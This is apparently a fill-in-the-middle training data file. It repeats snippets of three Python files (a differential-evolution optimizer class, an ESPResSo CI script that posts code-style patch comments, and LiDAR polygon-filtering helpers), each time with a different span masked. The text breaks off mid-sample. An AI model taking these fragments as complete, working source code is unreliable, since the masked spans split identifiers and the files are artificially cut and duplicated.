def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def <|fim_middle|>(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | set_end_method |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def <|fim_middle|>(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | create_population |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_indi<|fim_middle|># Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | vidual(self):
|
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self<|fim_middle|>im, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | , func, d |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
<|fim_middle|>return []
def return_cost_list(self):
return self.cost_list
<|fim▁end|> | |
<|file_name|>DifferentialEvolutionAbstract.py<|end_file_name|><|fim▁begin|>import numpy
class DifferentialEvolutionAbstract:
amount_of_individuals = None
f = None
p = None
end_method = None
def __init__(self, min_element=-1, max_element=1):
self.min_element = min_element
self.max_element = max_element
self.f = 0.5
self.p = 0.9
self.func = None
self.population = None
self.func_population = None
self.dim = 0
self.child_funcs = None
self.cost_list = []
self.end_method = 'max_iter'
def set_amount_of_individuals(self, amount_of_individuals):
self.amount_of_individuals = amount_of_individuals
def set_params(self, f, p):
self.f = f
self.p = p
def set_end_method(self, end_method):
self.end_method = end_method
def create_population(self):
# Создаем популяцию
population = []
for _ in range(self.amount_of_individuals):
population.append(numpy.random.uniform(self.min_element, self.max_element, self.dim))
return numpy.array(population)
def choose_best_individual(self):
# Данная функция находит лучшую особь в популяции
func_list = list(self.func_population)
best_index = func_list.index(min(func_list))
return self.population[best_index]
def iteration(self):
return []
def optimize(self, func, dim, end_cond, debug_pop_print=-1):
return []
def return_cost_list(self):
return self.cost_list
<|fim_middle|><|fim▁end|> | |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'<|fim▁hole|>MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)<|fim▁end|> |
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
|
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
<|fim_middle|>
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)
<|fim▁end|> | print("Not a pull request. Exiting now.")
exit(0) |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
<|fim_middle|>
<|fim▁end|> | patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment) |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
<|fim_middle|>
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)
<|fim▁end|> | comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes' |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
<|fim_middle|>
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment)
<|fim▁end|> | comment = 'To fix this' |
<|file_name|>gh_post_style_patch.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
#
# Copyright (C) 2018-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
if not os.environ.get('CI_COMMIT_REF_NAME', '').startswith('PR-'):
print("Not a pull request. Exiting now.")
exit(0)
import subprocess
import gh_post
SIZELIMIT = 10000
TOKEN_ESPRESSO_CI = 'style.patch'
# Delete obsolete posts
gh_post.delete_comments_by_token(TOKEN_ESPRESSO_CI)
MESSAGE = '''Your pull request does not meet our code formatting \
rules. {header}, please do one of the following:
- You can download a patch with my suggested changes \
[here]({url}/artifacts/raw/style.patch), inspect it and make \
changes manually.
- You can directly apply it to your repository by running \
`curl {url}/artifacts/raw/style.patch | git apply -`.
- You can run `maintainer/CI/fix_style.sh` to automatically fix your coding \
style. This is the same command that I have executed to generate the patch \
above, but it requires certain tools to be installed on your computer.
You can run `gitlab-runner exec docker style` afterwards to check if your \
changes worked out properly.
Please note that there are often multiple ways to correctly format code. \
As I am just a robot, I sometimes fail to identify the most aesthetically \
pleasing way. So please look over my suggested changes and adapt them \
where the style does not make sense.\
'''
# If the working directory is not clean, post a new comment
if subprocess.call(["git", "diff-index", "--quiet", "HEAD", "--"]) != 0:
patch = subprocess.check_output(['git', '--no-pager', 'diff'])
if len(patch) <= SIZELIMIT:
comment = 'Specifically, I suggest you make the following changes:'
comment += '\n```diff\n'
comment += patch.decode('utf-8').replace('`', r'\`').strip()
comment += '\n```\n'
comment += 'To apply these changes'
else:
comment = 'To fix this'
comment = MESSAGE.format(header=comment, url=gh_post.CI_JOB_URL)
if patch:
<|fim_middle|>
<|fim▁end|> | assert TOKEN_ESPRESSO_CI in comment
gh_post.post_message(comment) |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon<|fim▁hole|> pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts<|fim▁end|> | # This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False): |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
<|fim_middle|>
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This one is my own version of the ray-trace algorithm which utilises the numpy arrays so that a list of x and y coordinates can be processed in one call and only points inside polygon are returned alongside the indices in case required for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
<|fim_middle|>
# This retrieves all points within circular neighbourhood, Terget point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar wth polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
